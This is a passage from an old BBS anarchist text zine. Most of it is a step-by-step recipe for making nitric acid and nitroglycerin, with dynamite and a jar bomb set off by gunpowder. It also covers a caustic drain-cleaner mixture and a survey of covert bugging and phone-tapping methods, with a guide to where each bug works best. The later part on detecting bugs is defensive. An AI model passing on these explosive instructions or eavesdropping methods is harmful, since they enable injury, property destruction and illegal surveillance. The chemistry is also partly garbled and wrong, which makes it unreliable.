Put the | _ \ ______ || here - Nitrogen Dioxide (toxic!!!)
|
||
Sodium | / \ \D3 | ___ \ ||
|
||
Nitrate | | \ \___| | _| |_||_
|
||
crystals | | \------| | | | || | <----- Clear container with Nitrogen
|
||
in here /D1\ /\ |-| |----| Dixode bubbling through the
|
||
----> \__/ || |___D4___| water to turn it to Nitric Acid
|
||
HEAT ||
|
||
That is a cooling bracket (yeh I know it looks nothing like one but thats
|
||
life with TXT files!)...I hope that solves confusion over the following
|
||
instructions...Bet it doesn't! hah
|
||
|
||
ii) Right assemble the distillation/fractional distillation equipment or
|
||
homemade equipment if that's what you've done as shown above.
|
||
|
||
iii) Put the Sodium Nitrate crystals in the flat bottomed flask (D1) and
|
||
you may want to put some anti-bumping granules in too (tiny bits of
|
||
glass).
|
||
|
||
iv) Don't connect D4 or D5 at this time - just a bowl to get any crap that
|
||
comes off early.
|
||
|
||
v) Start pouring in the Sulphuric Acid(D2) and keep the mixture hot so the
|
||
reaction is real good. When it gets to around 79 degrees (I think) or
|
||
so then a red sort of mist comes about inside the equipment - don't
|
||
run like phuck away but be worried all the same since you have to move
|
||
fast now.....Connect D4 and D5 and make sure you don't breathe in any
|
||
of the red smoke (Nitrogen Dioxide) [If you wanna intoxicate yerself
|
||
then read my third Anarchists guide on....chemical weapons (dioxins)].
|
||
(It's probably best to make sure you don't breathe the crap in by add-
|
||
ing a second D4 thing on the end of D5 to filter off as much vapour as
|
||
possible).
|
||
|
||
vi) Once that's all over then you will have a nice concentrated nitric acid
|
||
in D4.....
|
||
|
||
[BTW - Remember to keep the cooling bracket D3 real cool with fresh cool run
|
||
ning water - or you won't get much at all].
|
||
|
||
|
||
NOTE: IT'S BEST TO STORE NITRIC ACID WHEN CONCENTRATED IN STEEL CONTAINERS
|
||
WHICH CAN RESIST THE CORROSIVE ACTION....USE GLOVES AT ALL TIMES...
|
||
|
||
|
||
4) Ok so now you have Sulphuric acid conc., Nitric acid conc. and glycerin.
|
||
Now for the difficult bit! (Haha You thought the worst was over)
|
||
|
||
5) Right this is a *** VERY *** dangerous bit.........
|
||
|
||
DON'T DO IT INDOORS...OR IN THE GARAGE - DO IT IN AN ISOLATED FIELD NEAR
|
||
YER HOUSE...IF YOU DON'T HAVE ONE THEN USE YER NEIGHBOURS GARDEN...
|
||
|
||
Get a wooden tray or box and fill it with ICE....make sure there's always
|
||
ice to stack it up - it * MUST * remain cool. Then get a conical flask
|
||
(phuck a round-bottomed one)...and a thermometer measuring up to 100 C.
|
||
|
||
Balance the flask carefully and securely in the ice bath and put the
|
||
thermometer in.
|
||
|
||
Get the Sulphuric, Nitric and glycerin in the following proportions:
|
||
|
||
Glycerin : Conc.Nitric : Conc.Sulphuric
|
||
3 : 1 1
|
||
|
||
I recommend using 1/2 litre quantities of both acids for the first batch.
|
||
|
||
|
||
6) WARNING: You are using conc.acids - they do not like water - they will
|
||
blow you up if you mistreat them by feeding them water - Make sure all
|
||
parts inside the equipment are PHUCKING dry.
|
||
|
||
Put the nitric acid into the flask and then * VERY * slowly pour in the
|
||
sulphuric acid whilst watching the temperature....(use a dropper).
|
||
|
||
MAKE SURE: If the temperature ever goes about 30 degrees C then pour the
|
||
contents of the flask into the ice bath and run like ****** PHUCK ******
|
||
|
||
As the temperature rises add the glycerin with a pipette (dropper) and
|
||
don't pour on any more until the temperature drops and is stable.
|
||
|
||
|
||
7) Repeat this until all the ingredients are gone......
|
||
|
||
8) Take the jar (very carefully - it's never blown up on me - but there's
|
||
a first for everything!) with the mixture of acids in it and look at the
|
||
bottom - there will be a layer that isn't quite colourless.....This is
|
||
the stuff you want. [^^^^^ At the bottom]
|
||
|
||
9) Carefully take off the top acid layer with a dropper/pipette or whatever
|
||
and store it for later use.
|
||
|
||
10) When you get near to the bottom layer (ie. Nitroglyerin) then carefully
|
||
pour on water to wash away the acids. Then let it settle again - repeat
|
||
this until you are satisfied that the acids are as gone as you can get
|
||
them - four or five times.
|
||
|
||
11) Now collect the nitroglycerin in a dry jar or something and carry it back
|
||
to your fridge in the ice bath (***** VERY CAREFULLY *****).
|
||
|
||
12) Now keep your nitroglycerin nice and cold (so it doesn't blow up your
|
||
house when you're watching TV or on your computer).
|
||
|
||
|
||
You can store Nitroglycerin in Kieselguhr (a type of clay) - then it's
|
||
easier to handle and store - add a fuse and you have dynamite.
|
||
|
||
|
||
You have now made nitroglycerin - now what to do with it?......
|
||
|
||
|
||
USE OF NITROGLYCERIN
|
||
|
||
|
||
Nitroglycerin is ofcourse a VERY high explosive. Not as high as good old
|
||
tri-nitro-toluene (TNT) but you'd find it real hard to make TNT - since
|
||
it most CERTAINLY can't be made with ordinary Sulphuric Acid.....you DO
|
||
need fuming sulphuric acid (a totally different substance).
|
||
|
||
So what to do with it?
|
||
|
||
Well if you want to blow it up you're unlikely to do it without using a
|
||
lighted fuse/detonator......it needs quite a kick to start itself off. You
|
||
can use gunpowder if you pack in into a tight space (see earlier) but the
|
||
best detonation cap I've come across is Mercury (ii) Fulminate - see Part3
|
||
of 'The Anarchists guide to...' for information on this and other kinds of
|
||
detonators. But saying that gunpowder still works well.....
|
||
|
||
An idea (never tried it but worth a go):
|
||
|
||
Try putting this lot in a jar with a fuse hanging out........
|
||
|
||
____
|
||
------------| | | -------- Nitroglycerin (not to scale)
|
||
Fuse |__|_|
|
||
(made with
|
||
fuse paper) |
|
||
|
|
||
|
|
||
|
||
Gunpowder (used as detonation cap)
|
||
|
||
|
||
DO THIS IN A VERY ISOLATED PLACE.......LIKE AN ISLAND OR A FOREST....SINCE
|
||
THE EXPLOSION IS * VERY * LOUD AND * VERY * WIDESPREAD.
|
||
|
||
*** YOU ONLY NEED A FEW DROPS TO MAKE A DECENT EXPLOSION!!!!!! ***
|
||
|
||
If you want to know about more stuff to use your Nitroglycerin for then you
|
||
can contact me on Palm Beach BBS +44(303)-265979 as Deceptor.
|
||
|
||
|
||
|
||
HOT STUFF
|
||
|
||
Don't really know what to call this other than 'HOT STUFF' - it gets bloody
|
||
hot and it eats away at Aluminium in seconds (well almost! heh).
|
||
|
||
1) Just go to the supermarket and buy some 'DRAINO' or stuff for unblocking
|
||
drains.
|
||
|
||
2) Make sure it's the powder one and take out all the bits of metal. Then
|
||
mix the leftover powder with water to make a hot and steaming liquid.
|
||
|
||
The mixture will then eat at aluminium, etc and really nicely - It doesn't
|
||
like bicycles....they tend to disappear after a while.
|
||
|
||
|
||
|
||
That's it for this Issue of Elektrix.....Stay in tune for Laser Weaponry....
|
||
Detonators.....Rocket Launchers......Grenades......and more in the next!
|
||
|
||
|
||
TO JOIN THE ANARCHISTS UNDERGROUND MAIL ME AT PALM BEACH
|
||
ONLY COMPETENT ANARCHISTS NEED APPLY (DECEPTOR)
|
||
|
||
|
||
-------------------- Palm Beach BBS ++44(303)-265979 -----------------------
|
||
|
||
----------------------------------------------------------------------------
|
||
| |
|
||
| ELEKTRIX Issue 1 - Part 3 |
|
||
| ~~~~~~~~~~~~~~~~~~~~~~~~~ |
|
||
| |
|
||
| A discussion of Electronic Surveillance techniques |
|
||
| by The Technic |
|
||
| |
|
||
| PALM BEACH BBS UK ++44(303)-265979 |
|
||
| |
|
||
----------------------------------------------------------------------------
|
||
Electronic Surviellance
|
||
|
||
Who'd bug me? I hear you ask what for, well just remember that with teh
|
||
introduction of EPSS in teh sattes and System X over here every call has a log
|
||
and that log contains who you called, where it was from and how long. In a rec
|
||
article in the Guardian it pointed out that BT and the police kept 40 people
|
||
"Under Surviellance" for 9 months before actaully arresting them for telephone
|
||
fraud. Still think no-one wants to bug you?, well later on there are some hand
|
||
tips to detect thses bugs but first you need to know what they are:
|
||
|
||
|
||
Body Mics.
|
||
|
||
These are just mics which are concealed on the body, then hooked up to a
|
||
transmitter or a recorder. These range from flat microphones taped to the skin
|
||
or tieclips, cufflinks, wrist watches whatever you need.
|
||
|
||
Condenser mics need their own power as they modify the power in accordance wit
|
||
the sound so results in thicker leads.
|
||
|
||
Range: Small and can pick up a lot of background noise
|
||
|
||
Conditions: Close contact, quiet - good for conversations etc.
|
||
|
||
Cost: Relatively cheap.
|
||
|
||
|
||
Contact Mics. Spikes. Tube Mics.
|
||
|
||
This allows the eavesdropper to listen in on someone in the next room, they
|
||
come in several types.
|
||
|
||
|
||
Contact Mics
|
||
|
||
These mics respond to vibrations in a sounding board like a door, and are
|
||
available as pickups for guitars etc. The sounding board can be a door, a
|
||
window, or a thin wall and only need to be pressed or glued to the board.
|
||
As the wall gets thicker it is harder ( if not impossible ) to use a contact
|
||
mic. this can be solved with ....
|
||
|
||
Spikes
|
||
|
||
A spike is a spike of hardened steel which is hammered into the wall and nearl
|
||
comeout at the other end - but not quite, then a microphone is mounted on the
|
||
spike which will pick up the vibrations from the next room.
|
||
|
||
|
||
Tube Mikes
|
||
|
||
These are simply microphones in a sealed box with a small plastic tube
|
||
protruding from it. Then connect the mic to an amplifier and then stick the
|
||
tube where u want (a keyhole) and then listen. You can drill a hole in the wal
|
||
or use the back to back sockets in hotels, if drilling make sure that no bits
|
||
plaster fall off - common method of detection.
|
||
|
||
Range: Next room or can be used with a transmitter
|
||
|
||
Conditions: Just needs to be close
|
||
|
||
Cost: The mics are cheap but the radio bugs and associated equipment can be
|
||
expensive
|
||
|
||
|
||
Small Directional Mics.
|
||
|
||
These are designed to be used at short distances and directional so they can
|
||
pick up a conversation. Can be mounted in a briefcase or in a pen etc. and mus
|
||
be aimed at the target - the briefcase one can be conected to a tape recorder.
|
||
Pen or sleeve types can be connected to a pocket recorder. A variation is a MI
|
||
mounted in a small bell shaped object and is held in the hand, then you walk i
|
||
front of the trget and they will not suspects anyone following from the front.
|
||
|
||
Range: Small and can pick up a lot of background noise
|
||
|
||
Conditions: Useless in a crowded street, or with something between target and
|
||
|
||
Cost: Relatively cheap.
|
||
|
||
|
||
Shotugn, Machine Gun, Rifle Mics.
|
||
|
||
These are long distance directional microphones, and often have handles and
|
||
can resemble guns ( be careful when aiming one of these at someone as they
|
||
might think it is a gun and you might not be wearing a bullet proof vest).
|
||
These are then hooked up to an amplifier or tape recorder, swing from left
|
||
to right and stop when sound is loudest. These can be difficult to conceal
|
||
and difficult to aim, also without a frequency analyser to level out sounds
|
||
any background noise can drown the conversation.
|
||
|
||
Range: can be several hundred feet Conditions: calm weather and quiet
|
||
|
||
Cost: expensive with amp and accesories
|
||
|
||
Parabolic Mics.
|
||
|
||
These are very like rifle mikes, usually a large circular metal or plastic dis
|
||
which reflects sound to a microphone mounted in the centre of the dish. They
|
||
are not as sensitve as rifle mics. but are a lot cheaper, they are bulky thoug
|
||
and difficult to hide. You can hide a rifle mike under a long coat but not a
|
||
dish unless your a woman who happens to be pregnant. Can use bird song
|
||
recording as a cover - with a bird book in your pocket etc. tweed jacket.
|
||
Condenser or Crystal mics best for long range devices, output is usually highe
|
||
than dynamic mics. These can be bought anywhere - cheap.
|
||
|
||
Range: can be several hundred feet Conditions: calm weather and quiet
|
||
|
||
Cost: expensive with amp and accesories
|
||
|
||
Like rifle MIC.
|
||
|
||
|
||
Radio Bugs
|
||
|
||
This is a small transmitter with a microphone. The devices can be combined to
|
||
perform as a reciever and a microphone ( used in mind reading acts ). They are
|
||
broadly split into two types - those which power them selves and those which
|
||
draw power from some source. Bear inmind the size also has to include the
|
||
antenna which can be several inches long. There is a problem of signal drift
|
||
which can be overcome with a crystal control - but this requires more power.
|
||
|
||
If they are not diguised they can be a dead give away ( they reciver doesn`t
|
||
need to be disguised as the bugs can be tuned to operate on FM (VHF) or AM so
|
||
just listen in your radio or car radio), to get around this several novel
|
||
methods of disguise have been used.
|
||
|
||
Martini Olive Bug
|
||
|
||
This is designed to look like an olive on a cocktail stick, the transmitter
|
||
is the olive and the antenna the stick. Range about fifty feet and can functio
|
||
happily at the bottom of the glass.
|
||
|
||
Sugar-Cube Bug
|
||
|
||
This has two audio frequency circuits and three radio frequency circuits.
|
||
Sealed in a protective silicon shell designed to resemble a sugar cube. Can
|
||
transmit while at the bottom of a cup of coffee.
|
||
|
||
Pen Bug
|
||
|
||
Ball point or fountain pen and switched on by twisting the barrel or removing
|
||
the cap and placing on the other end and they write.
|
||
|
||
Calulator Bug
|
||
|
||
Transmitter is built into a popular calculator which will function normally
|
||
and can draw power from the calculator battery.
|
||
|
||
Plug Bug
|
||
|
||
Looks like a standard 13 amp plug but has a transmitter whihc has own battery
|
||
or can draw power from mains. Also can use earth wire as antenna.
|
||
|
||
Adaptor Bug.
|
||
|
||
Works like an ordinary plug but transmitter built in , can use mains power.
|
||
|
||
Light Switch Bug
|
||
|
||
Built into the back of a rocker type light switch and draws power from mains
|
||
supply - two models available - one which is on all the time and one which
|
||
transmits only when the light is on.
|
||
|
||
A problem with all these bugs is the limited battery life, there are several
|
||
methods of extending battery life. Vox activated - these have a preset level
|
||
at which they will switch on and a delay when they stop (so they dont stop whi
|
||
there is a gap in a sentance) but because of the switch the bug is bigger.
|
||
Another method is to incorporate a timer circuit and this will turn the bug
|
||
on and off when set ( digital watch technology) can be set 9-5 when people are
|
||
in offices. A more expensive way is to use a radio controlled bug, a coded
|
||
signal is sent to activate the bug and then it switches off after two minutes.
|
||
Very expensive though.
|
||
|
||
HOMERS
|
||
|
||
These are radio transmitters used to track someone, it is simply a transmitter
|
||
which sends high powered pulses and a reciever picks them up as a series of
|
||
beeps, the transmitter is usually the size of a cigarette packet and has a sho
|
||
rigid aerial sticking out and a couple of powerful magnets to hold it onto the
|
||
car. The receivers depend on what you can afford, simplest is one with no
|
||
direction capabitlity and relies on volume - the closer you get the louder it
|
||
gets. Then there are those which indicate direction , this can be a vertically
|
||
mounted loop aerial or a pair of aerials on on each side of the vehicle. When
|
||
you pick up the sound turn until it is loudest then you are in the same plane
|
||
as the homer then you can gauge how far away by the speed of the beeps ( the
|
||
faster the closer) this plane can be behind you as well as in front though.
|
||
Some extra features are range control - you switch as you get closer e.g
|
||
1st settings beeps until a continuous tone then within 6 miles, then 2nd setti
|
||
this goes into a continuous tone within one mile etc. Another feature can be t
|
||
null switch , if the target is directly in front or behind you there is no sou
|
||
if the target moves left or right you will get a tone ( different for left and
|
||
right). Doppler shift recievers will tell you in which direction the target i
|
||
moving but its expensive.
|
||
|
||
Homing people can be done by incorporating the homer into a card ( business or
|
||
credit, make sure its think or coloured so the electronics can`t be seen) but
|
||
you canot have a battery so it relies on the radiation given out by Tv sets an
|
||
radio`s and other electrical appliances and converts them into a series of bee
|
||
They are only suitable for close work.
|
||
|
||
Laser Bug
|
||
|
||
This is rather like a contact mike as it relies on the vibrations produced by
|
||
sound on the window, it reflects light waves and when they hit the window they
|
||
will be modulated slightly. Feed a pulsed power supply to a laser and direct t
|
||
beam at the window and some of this light will be reflected back, use a good
|
||
astronomical telescope to focus the light and then it passes through a pinhole
|
||
and onto a photomultiplier tube. The tube and its electronics detects variatio
|
||
in pulse width and translates them back into sound. Infra red can be used, but
|
||
you will have to use an ordinary light source to target it. Another way is to
|
||
use cd lasers to pick up conversations and transmit them to a receiver miles
|
||
away but you will have to line it up VERY accurately. It is also hard to detec
|
||
or stumble across accidently.
|
||
|
||
Infra Red Transmitter
|
||
This can transmit up to 500 metres and is similar to a radio bug, the bug
|
||
must be by a window though and a special reciever is needed ( maybe in a camer
|
||
|
||
|
||
Telephone Tapping
|
||
|
||
Tapping telephones can be done several ways and each relies on different
|
||
equipment.
|
||
|
||
Inductive Tap
|
||
|
||
Induction microphones are very cheap and be bought anywhere , they are a
|
||
couple of inches long and about half an inch across (cylindrical), it has two
|
||
wires coming out of one end and a sucker on teh other end. The wiring can go t
|
||
a tape recorded or an amplifier, obviu\ously this can`t be used but there are
|
||
mics which are disguised as pads or other desk objects, in most cases a minatu
|
||
amplifier is needed. Another type fits over the phone line and alos houses a
|
||
transmitter also it doesn`t cut into the cable although the sound is weak.
|
||
Alos note that they can be detected if a radio transmitter is built in and the
|
||
can pick up humming from electrical devices.
|
||
|
||
Radio Tap
|
||
|
||
These are transmitting bugs specifically designed for use with phones. The mos
|
||
common device in the ...
|
||
|
||
Drop in Mike
|
||
|
||
This is so called as in america the microphone just had to be unscrewed and th
|
||
new transmitter dropped in. It draws its power from the phone and needs no
|
||
maintenance. It acts like a normal microphone and transmits all conversations.
|
||
|
||
Series an Parallel
|
||
|
||
The obvious difference between these is the way in which theuy are connected t
|
||
the phone line, the parallel is connected over both lines whereas the series
|
||
is connected over one, they can both incorporate a small transmitter.
|
||
The Parallel bug can be line or battery powered, but you can get the best of
|
||
both worlds by having them trickle charged - it draws minute quantities and is
|
||
difficult to detect via a meter. Battery powered versions are said to have a
|
||
better range and they operate all the time so could lead to detection. No
|
||
wires have to be cut to install this bug.
|
||
The series bug is more common and cheaper, it can be batery or line powered b
|
||
will only transmit when the phone is in use - this makes detection difficult.
|
||
The line powered versions are smaller , about an inch square and half an inch
|
||
think - hiding it in a phone or junction box is easy.
|
||
|
||
Third Wire Bug
|
||
|
||
These bugs are connected in paralleland normally line powered although a
|
||
rechargable battery version is available. Average size is around 1 and half
|
||
inches by half an inch, it operates like a prallel bug but when not in use
|
||
switches to its own internal microphone and transmits souns from the room,
|
||
this is reputedly favourite amongst USA law enforcement agencies.
|
||
|
||
Infinity Transmitter
|
||
|
||
These are around the size of a third wire bug and are the most exotic type of
|
||
bug. They cannot monitor telephone conversations but the device is line
|
||
powered and can be connected anywhere along the phone line ( or inside the
|
||
phone) the person calls the target and then sends a tone down the line which
|
||
activates the Bug. The tone is matched to a reciving unit in the bug and thus
|
||
they are also known as Harmonica bugs. The bug cancels the bell of the
|
||
victim's phone and uses an internal mic or the phones mic to send the room
|
||
conversation down the line - note that these cannot be used wher ther is a
|
||
switchboard due to the direct dialling technique. There are several variaitons
|
||
of this bug - One device waits for the eavesdropper to dail and then expects a
|
||
tone immediately this cancels the bell so it doesn't even ring. However the
|
||
bell could ring and alert the victim. Another device waits for the victim to
|
||
answer and then says he has a wrong number, when the victim hangs up the
|
||
device is activated. Another device automatically cuts out the handset if the
|
||
phone is lifted so operates normally, some cut off after a certain amount of
|
||
time, some incorporate an led so that installation is easy as the light will b
|
||
on if installed correctly. They don't need batteries or further attention
|
||
once installed. They are very difficult to detect and even the phone company
|
||
can miss it if its off.
|
||
|
||
Hookswitch Defeat
|
||
|
||
This is the switch the handset is dropped onto, by defeating this the micropho
|
||
will still be activated and you can listen in. The defeat can be done by a
|
||
resistor connected across the switch - an amplifier would be needed on the
|
||
listeners side as the volume level will be low. The method is to call up say
|
||
that you have a wrong number and then don't hang up when he does, then listen
|
||
Although this can work for anyone else too so some are remote controlled. (ton
|
||
or radio activated). They are hard to detect and cheap, ( can`t detect as its
|
||
only one component).
|
||
|
||
Drop Out Relay
|
||
|
||
These are widely available and are just electronic switches which switch on
|
||
whenever the phone is in use. Some have their own batteries or line powered
|
||
and can activate taperecorders etc. by the raly - just clip on and put the
|
||
other lead in the tape recorder. They are easy to install and can be used
|
||
legitimately.
|
||
|
||
Lost Transmitters
|
||
|
||
This is a bug which is designed to blend in with the electrical components
|
||
- they are wired into the circuit board and transmit whenever it is in use
|
||
and will pick up sounds from the room. These are very expensive if one is foun
|
||
this means you are dealing with some very nasty people.
|
||
|
||
Direct Tap
|
||
|
||
All you need is a pair of high impedence head phones and connected to the line
|
||
via crocodile clips with a capacitor in between to keep out the phone companie
|
||
electricity. There are many disadvantages as it is very easy to spot and when
|
||
installing and produce clicking noises on the line. A higher voltage will pass
|
||
through the lines or terminals and this can be detected by a meter or bulb, th
|
||
headphones can be replaced by a tranformer and then to a tape recorder.
|
||
Excellent Quality.
|
||
|
||
Ok so there are the bugs now how the F**K do you find them!
|
||
|
||
|
||
BUGGING - Guidelines
|
||
|
||
Stick to these if possible, use own judgement in special situations.
|
||
|
||
Situation Device Used Remarks
|
||
|
||
Rural Rifle,MIC. Bulky, difficult to conceal,
|
||
Location Parabolic mic. need little background noise
|
||
and good weather.
|
||
|
||
Urban Small Directional Difficult to operate in
|
||
Location MIC. crowded streets. Background
|
||
noise a problem.
|
||
|
||
Vehicle Radio bug, Am- FM Power a problem unless
|
||
VHF, connected to car power.
|
||
Can pick up interference fro
|
||
vehicle electrics, effecienc
|
||
will fluctuate as receiver
|
||
will have to follow close
|
||
behind.
|
||
|
||
Tape Recorder Normally lots of space in ca
|
||
( dash, under seat ), but ne
|
||
change tapes. Quality and
|
||
reliability excellent.
|
||
|
||
Restaurants etc. Concealed directional Easy to use, good quality,
|
||
Mike. Get close to target. Table b
|
||
wall - less background noise
|
||
use less against noisy room.
|
||
|
||
Offices/Rooms Tape Recorder Difficult to conceal and nee
|
||
with access. regular access - excellent
|
||
quality.
|
||
|
||
Wired Mic. Range limited to length of w
|
||
can be time consuming to
|
||
install - may lead to detect
|
||
no further attention after
|
||
installation. Quality very
|
||
good.
|
||
|
||
Radio Bug Battery type have a limited
|
||
life but more flexible in
|
||
installation. 100 yard range
|
||
quality can be very poor.
|
||
use VOX ( voice activate) to
|
||
reduce detection.
|
||
|
||
Hookswitch Defeat Open telephone MIC. room
|
||
conservation carried down li
|
||
Resistor, capacitor or diode
|
||
can be used.Can be missed by
|
||
physical search. Works Well.
|
||
|
||
Office/Room
|
||
Without access Contact Mic. Easy and quick, install on
|
||
window, door, or wall. Good
|
||
results depends on thickness
|
||
of wall ( sounding board ).
|
||
Difficult to detect.
|
||
|
||
Tube Mic. Can be pushed through cracks
|
||
wall, through keyholes, unde
|
||
doors, in back to back socke
|
||
installation canbe noisy
|
||
(drill holes), work well.
|
||
Very difficult to detect.
|
||
|
||
Spike Mic. Noisy and difficult to insta
|
||
but can work well. Difficult
|
||
detect. But can be detected
|
||
metal detector.
|
||
|
||
Infinity Transmitter Fitted easily along phone li
|
||
carries conversation anywher
|
||
works, good quality and hard
|
||
to detect.
|
||
|
||
Laser Bug Safest way, but expensive.
|
||
|
||
|
||
Telephone Tapping
|
||
|
||
Type Remarks
|
||
|
||
|
||
Direct Tap Simple to install, especially at terminal box,
|
||
Headphones can be used, or drop out relay and recorde
|
||
Very good quality.
|
||
|
||
Inductive Tap No connections needed, easy to install but has to be
|
||
close to phone, needs wiring to transmitter - can be
|
||
easy to detect. Quality is poor.
|
||
|
||
Series or Parallel Can be connected anywhere along the line or concealed
|
||
Tap in phone or junction box. Transmits phone conversatio
|
||
to receiver, poor quality ( as in radio bug) but can
|
||
power from line or battery.
|
||
|
||
Third Wire Bug As above but transmits romm conversation when phone n
|
||
in use.
|
||
|
||
Lost transmitter Made to blend in with background of electronics
|
||
components - expensive, dificult to fit but equally
|
||
difficult to detect.
|
||
|
||
Drop in Bug Simple to install and some difficult to detect by
|
||
physical search. Needs no attention and is reliable.
|
||
|
||
|
||
Detecting
|
||
|
||
1. Physical search - start outside the house and walk slowly around it and
|
||
examine eveything carefully, look for any wires going int
|
||
Outside House the walls and make sure you know what they are for and
|
||
follow them back to the pole etc. look for wires spliced
|
||
into the cable, particularly in the top of the pole. Ther
|
||
may be an inspection hatch if the cables go under ground
|
||
so try and lift and inspect it. If in a large building
|
||
look in the terminal box for any wires across terminals i
|
||
anything suspicious is found then call the company. While
|
||
walking outside examine the windows ( frames as well) loo
|
||
for signs of disturbance.
|
||
|
||
Inside House Examine ALL furniture, check backs and drawers, wardrobes
|
||
etc. Look under beds - under the fabric underneath, look
|
||
for holes, bedrooms are favourite. Standard bugs have a w
|
||
trailing from them, and a battery on the outside. Don`t
|
||
forget all the disguised bugs and any household ornaments
|
||
remnove green felt or feel underneath for holes.Ask where
|
||
all objects came from, look at all pictures and frames ma
|
||
sure they haven`t been tampered with . Examine walls,
|
||
ceilings and floors, also curtains and pelmets, roll back
|
||
carpets and examine floorboards. Anything suspicious then
|
||
take up the floor boards and have a look. Look for any
|
||
suspicious wires tucked under the edges of carpets. Alway
|
||
examine ceilings from above if possible, especially in
|
||
bedrooms, wear overalls. If only from below have a look
|
||
at flaking paint in walls and ceiling and look for mis-
|
||
matched areas of paint. Examine any holes but check for
|
||
electrical wires etc. first. Houses and apartments with
|
||
party walls have problems, the best way to see these is t
|
||
check for flaking paint or small holes. Don`t go round to
|
||
neighbours whenn found - they aren`t going to let you in
|
||
they have bugged you. You can dig away at the wall and kn
|
||
the spike out. Holes for tube mikes can be blocked up wit
|
||
plaster filler effectively knocking it out. Switch off th
|
||
mains and look at light sockets ( unscrew ), and look for
|
||
any extra components. With the power unscrew the ceiling
|
||
roses and take a look inside, also any other light
|
||
fittings.
|
||
|
||
The telephone Pickup the handset and unscrew, examine the telephone
|
||
thoroughly, small bkack cubes with wires are trouble, che
|
||
the hookswitch action, make sure it shuts off the mic,
|
||
examine all wires thoroughly and see where they go, check
|
||
to see if any are thinnner or thicker and if they use pro
|
||
terminals or not. Put phone back together and check junct
|
||
box, look at terminals and check telegraph pole and the
|
||
junction box at the top.
|
||
|
||
2. Electrical First use metal detector,check walls, celings, floors any
|
||
pipes will run in a straight line , helpful to know where
|
||
the pipes etc. run Check any ornaments with the detector
|
||
shake ornaments and check weight, look at base for holes
|
||
covered with filler.
|
||
|
||
If no equipment use VHF radio and turn control to see if
|
||
any screech happens, put next to phone if screech then th
|
||
line bug, make a call and test again , check junction box
|
||
same way, Use tv with indoor aerial, make a loud noise an
|
||
turn tv down and tune tv - if a bug then horizontal lines
|
||
appear which wil jump to the music - nearer the bug large
|
||
the jump, - this will pick up the bug ( if VHF) from a
|
||
distance away , send the sound source to several adjoinin
|
||
rooms to detect bugs further away. If found carry on onto
|
||
rest of bandwidth, get someone to make a call and check
|
||
again. examine terminal box - voltage between terminals
|
||
should be 46-50v if lower may be a bug in parallel, infin
|
||
drop till under 10, lift handset measure voltage 2-12v. i
|
||
higher then something connected in series (series bug).
|
||
Open phone and check microphone terminals - hold down hoo
|
||
switch and if voltage across mic then hookswitch defeat e
|
||
Check volts across terminal while sending tones down line
|
||
Examine car, underneath for homers, look at woring for
|
||
splicing and under dash, feedback search,
|
||
|
||
Deterrence Paint a thin stripe of nail varnish across gaps, tighten
|
||
screws then undo by a quarter or 3/4 then make a note of
|
||
where the slots and the screws are. Apply to junction box
|
||
too. Check all people coming in and restrict entry - watc
|
||
at all times. If to toilet go to bedroom and find summit
|
||
do. If bug found hold a bait meeting to lure eaves droppe
|
||
If not return to bug and drain bettery so has to replace.
|
||
if bug reconnect wire several times while making a call,
|
||
series jiggle the hookswitch and then cut off bug.
|
||
|
||
Training Use labur force, Carbon ribbons just dumped in bin wherea
|
||
documents shredded. Short hand pads left in drawer docume
|
||
locked away. People wander around freely - ask who - if
|
||
be careful of security etc. car phone a big risk and
|
||
portable or freeway wireless ones. use phones far away fr
|
||
hotels etc. use different tables at restaurants etc. lase
|
||
bug prevent heavy curtains blinds etc. and clean windows
|
||
( dirty ones reflect more) - itemised phone bills, cellul
|
||
radio - big brother - easy to detect, satellite,
|
||
|
||
|
||
|
||
Detecting Bugs
|
||
|
||
This can be quite cheap and easy.
|
||
|
||
Field Strength Meter
|
||
|
||
This is bascially a crystal radio set connected to a meter instead of a speake
|
||
It shows the power output of any transmitter in the vicinity and is sold as an
|
||
aid to ham radio operators. The sensitivity is low so detection should not be
|
||
further than 12 inches away from the bug. If it does detect something the need
|
||
will swing across so the furthest swing will be closest to the meter. A proble
|
||
can be that they will react to a passing polics car or a commercial radio
|
||
station. If one is bought with a receiver circuit then it is tunable so you ca
|
||
tune into the frequency of the bug. Also an amplifier can aid detection.
|
||
|
||
Feed Back Detector
|
||
|
||
When a transmitter gets to close to a receiver then feedback is produced ( if
|
||
at the same frequency). This type of detector relies on feedback and is couple
|
||
to an amplifier and a receiver circuit. When using these you will need a noise
|
||
for the bug to transmit ( singing etc.) ,Then you simply scan through the
|
||
frequencies and if there is a bug transmitting you will get a squeal as the
|
||
detector hits the same frequency.
|
||
The Feedback detector generally has a further range but can tip off an
|
||
eavesdropper because of the noise.
|
||
|
||
Telephone Analyser
|
||
|
||
This is expensive equipment which will carry out a series of tests on a phone
|
||
line semi automatically. These are particularly useful when dealing with
|
||
complicated phone set ups like a switchboard. Tracing an individual pair of
|
||
wires without one of these can be tedious.
|
||
|
||
The tests actually carried out vary from machine to machine, they usually come
|
||
in attache cases and are battery powered. The first test will be to measure th
|
||
voltage across a phone line when the phone is on and off the hook. If the volt
|
||
is lower than it should be it may be a bug. If the voltage at the mic is too h
|
||
then it could be a bug. There is no difference between this and an ordinary vo
|
||
meter. The next test is a tone sweep, the analyser sweeps through the spectrum
|
||
and then if anything which reacts to a tone is on the line it will reduce the
|
||
voltage on the line and the analyser will detect this, stop and give you a
|
||
warning.
|
||
|
||
The next test is high voltage pulsing a charge is built up then fired down the
|
||
line, some hookswitch defeats use a change of voltage to trigger them, if
|
||
a hook switch is activated the analyser will pick up the voltage of the
|
||
microphone and the alarm will go off.
|
||
|
||
Another test is audio listening, the operator will listen to the line and an
|
||
acoustic generator is switched on. If the operator hears a tone down the line
|
||
then some osrt of hookswitch defeat is in operation, this method can also dete
|
||
infinity transmitters as any noise will be transmitted down the line which the
|
||
operator will hear. Each individual wire is tested against each other to see i
|
||
the sound from the generator is being transmitted down the phone line. (n.b.
|
||
tone has to be around voice frequency).
|
||
|
||
Any good analyser wil test al these any may even test for conductive paint on
|
||
casing being used.
|
||
|
||
Spectrum Analyser
|
||
|
||
This sweeps entire frequency bands in the same way as a field strength meter
|
||
searches for radiation. A typical sophisticated Spectrum Analyser can sweep
|
||
between 20 kilohertz and 2000 megahertz. Some can do this all in one go or in
|
||
separate plug in modules. It should carry out the scan automatically and when
|
||
it detects a transmission it will stop and display the frequency, and the
|
||
strength of the signal on a field strength meter and let you listen to the
|
||
transmission on an internal speaker. Some analysers have a cathode ray tube
|
||
as an oscilloscope to display the waveform and even buy another CRT which show
|
||
the frequency versus amplitude of demodulated components of the primary signal
|
||
